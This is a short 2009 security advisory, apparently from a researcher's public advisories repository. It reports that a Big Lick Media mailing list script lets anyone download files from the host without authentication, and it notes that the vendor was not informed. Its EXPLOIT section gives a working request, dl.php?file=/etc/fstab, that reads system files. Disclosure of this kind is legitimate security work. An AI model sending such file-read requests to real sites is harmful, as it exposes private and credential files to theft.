jay.scot

       big-lick-mailing-list.txt - advisories - Security advisories that I have released to the public.
 (HTM) git clone git://jay.scot/advisories
 (DIR) Log
 (DIR) Files
 (DIR) Refs
 (DIR) README
       ---
       big-lick-mailing-list.txt (482B)
       ---
            1 
            2 
            3 Name            Big Lick Media: Mailing List
            4 Severity        High
            5 Vendor          www.biglickmedia.com
            6 Authors         Jay Scott
            7 Date            10th Jan 2009
            8 Status          Vendor has NOT been informed
            9 
           10 
           11 DESCRIPTION
           12 
           13 Poor coding allows anyone to download a file on the host without
           14 requiring authentication.
           15 
           16 
           17 EXPLOIT
           18 
           19 Simply go to the following address in a web browser. Change the file
           20 variable to the file you wish to download.
           21 
           22 <path to application>/dl.php?file=/etc/fstab
           23